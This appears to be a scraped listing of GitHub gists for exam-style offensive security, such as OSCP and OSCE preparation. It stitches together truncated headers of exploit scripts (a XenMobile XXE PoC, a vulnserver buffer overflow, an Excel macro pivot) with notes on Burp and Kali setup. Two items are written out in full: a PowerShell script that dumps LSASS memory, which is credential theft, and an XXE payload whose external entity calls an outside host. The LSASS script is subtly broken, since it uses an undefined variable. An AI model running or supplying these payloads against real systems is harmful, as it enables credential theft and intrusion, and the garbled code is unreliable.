crypt0b0y
@jonaslejon
jonaslejon / xenxxe.py
Last active September 9, 2021 06:07
Citrix XenMobile XXE Exploit
#!/usr/bin/python3
##
## PoC test for the XXE security vulnerability CVE-2018-10653 in XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28 <jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##
import requests
import sys
@r00tpgp
r00tpgp / poc_GTER-W00T.py
Last active March 16, 2020 21:13
vulnserver.exe Buffer Overflow scripts in preparation for CTP/OSCE Exam
#!/usr/bin/python
# vulnserver.exe GTER BoF using egghunter by r00tpgp
# 9/6/2018
# In preparation for CTP/OSCE
# final evil payload is sent after few seconds delay to enable egghunter to locate it
#
import socket
import os
import sys
import time
@PaulSec
PaulSec / coin-hive.txt
Last active April 20, 2022 07:32
Extract of domains from the Alexa Top 1M list (and from investigations) that use the coin-hive mining service
@coffeegist
coffeegist / nmap-tcp-full.sh
Last active June 21, 2024 16:04
OSCP nmap scripts
#!/bin/bash
# Full TCP service scan of the ports a quick scan (nmap XML output) found open.
if [ "$#" -ne 3 ]; then
echo "Usage: nmap-tcp-full.sh <TCP-QUICK-RESULTS.XML> <TARGET> <OUTPUT-FILENAME>"
exit 1
fi
# Pull the TCP port numbers out of the quick-scan XML and join them with commas
PORTS=$(grep portid "$1" | grep 'protocol="tcp"' | cut -d'"' -f4 | paste -sd "," -)
nmap -nvv -Pn -sSV -T1 -p"$PORTS" --version-intensity 9 -A -oA "$3" "$2"
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)
.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object
.PARAMETER Target
Remote host to pivot to
.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
@decidedlygray
decidedlygray / ModifyAndBuildingBurpExtensions.md
Created August 10, 2017 00:58
Modifying and Building Burp Extensions Quick Reference

Quick Reference

This section is a boiled-down version of everything above and should serve as an easy reference. These steps assume you have identified and installed the correct JDK.

Modify and Re-Jar Extension

  1. Locate the jar file: Extender > Extensions > Select extension > Details. The bapps\ directory is located at C:\Users\yourusername\AppData\Roaming\BurpSuite\bapps
  2. Backup the original jar file to a different folder, outside of bapps.
  3. Change the extension from .jar to .zip, extract the contents, then delete the .zip file
  4. Make your modifications
  5. Re-jar: jar cvf yourJarName.jar -C extractedContentsDirectory/ .
** If you do not have 1.5 hours, you can skip dist-upgrade, === Advanced === and the disk shrink. That saves half an hour.
Detailed installation walkthrough: https://youtu.be/nZ3mDnpZeic
https://kali.download/base-images/*/*-installer-amd64.iso.torrent
/etc/network/interfaces - change the interface to eth0
static
address 192.168.192.64
netmask 255.255.255.0
@mgeeky
mgeeky / msfvenom-reverse-tcp-WaitForSingleObject.md
Last active January 16, 2025 19:33
(OSCE/CTP, Module #3: Backdooring PE Files) Document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches.

Looking for the WaitForSingleObject call within a modern msfvenom-generated payload.

Abstract

This document explains how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching on issues such as stack alignment and locating and patching WaitForSingleObject. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching on the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.

Contents:

@natesubra
natesubra / Dump-LSASS.ps1
Last active April 25, 2020 20:51
LSASS minidump
$LSASSProc = Get-Process lsass
$FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create)
$Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$FileStream.Close()
@staaldraad
staaldraad / XXE_payloads
Last active October 30, 2025 17:31
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>